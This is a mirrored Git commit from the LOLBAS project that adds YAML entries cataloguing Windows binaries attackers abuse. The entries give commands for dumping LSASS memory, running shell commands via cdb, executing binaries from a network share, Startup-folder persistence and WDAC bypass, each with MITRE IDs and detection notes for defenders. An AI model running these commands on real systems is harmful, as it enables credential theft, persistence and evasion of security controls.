public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-26 12:12:31 +02:00
Code Issues Projects Releases Wiki Activity

Merge branch 'master' into fixing-yaml-issues

Browse Source
This commit is contained in:
Oddvar Moe
2021-10-22 14:53:09 +02:00
committed by GitHub
parent 2e08819eef 3b848e6121
commit a55e2249c1
26 changed files with 535 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
yml/OtherMSBinaries/Adplus.yml Normal file
View File

@@ -0,0 +1,27 @@
---
Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 1/9/2021
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreLink: https://attack.mitre.org/techniques/T1003/
OperatingSystem: All Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
---

19
yml/OtherMSBinaries/Cdb.yml
View File

@@ -12,6 +12,16 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
Description: Attaching to any process and executing shell commands
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
@@ -23,7 +33,12 @@ Resources:
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
Acknowledgement:
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
Acknoledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---
- Person: mr.d0x
Handle: '@mrd0x'
- Person: Spooky Sec
Handle: '@sec_spooky'
---

38
yml/OtherMSBinaries/Fsi.yml Normal file
View File

@@ -0,0 +1,38 @@
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

36
yml/OtherMSBinaries/FsiAnyCpu.yml Normal file
View File

@@ -0,0 +1,36 @@
---
Name: FsiAnyCpu.exe
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

43
yml/OtherMSBinaries/Remote.yml Normal file
View File

@@ -0,0 +1,43 @@
---
Name: Remote.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 1/6/2021
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
- IOC: remote.exe spawned
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
---

17
yml/OtherMSBinaries/Update.yml
View File

@@ -92,6 +92,22 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1547
MitreLink: https://attack.mitre.org/techniques/T1547/001/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1070
MitreLink: https://attack.mitre.org/techniques/T1070/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\update.exe'
Code_Sample:
@@ -114,4 +130,5 @@ Acknowledgement:
Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
- Person: Jesus Galvez
---

26
yml/OtherMSBinaries/VSIISExeLauncher.yml Normal file
View File

@@ -0,0 +1,26 @@
---
Name: VSIISExeLauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'timwhite'
Created: '2021-09-24'
Commands:
- Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 and up with VS/VScode installed
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:
- Code:
Detection:
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez
Acknowledgement:
- Person: timwhite
Handle:
---

31
yml/OtherMSBinaries/VisualUiaVerifyNative.yml Normal file
View File

@@ -0,0 +1,31 @@
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Acknowledgement:
- Person: Lee Christensen
Handle: '@tifkin'
- Person: Jimmy
Handle: '@bohops'
---

28
yml/OtherMSBinaries/Wfc.yml Normal file
View File

@@ -0,0 +1,28 @@
---
Name: Wfc.exe
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Jimmy
Handle: '@bohops'
---

1
yml/OtherMSBinaries/Winword.yml
View File

@@ -13,6 +13,7 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe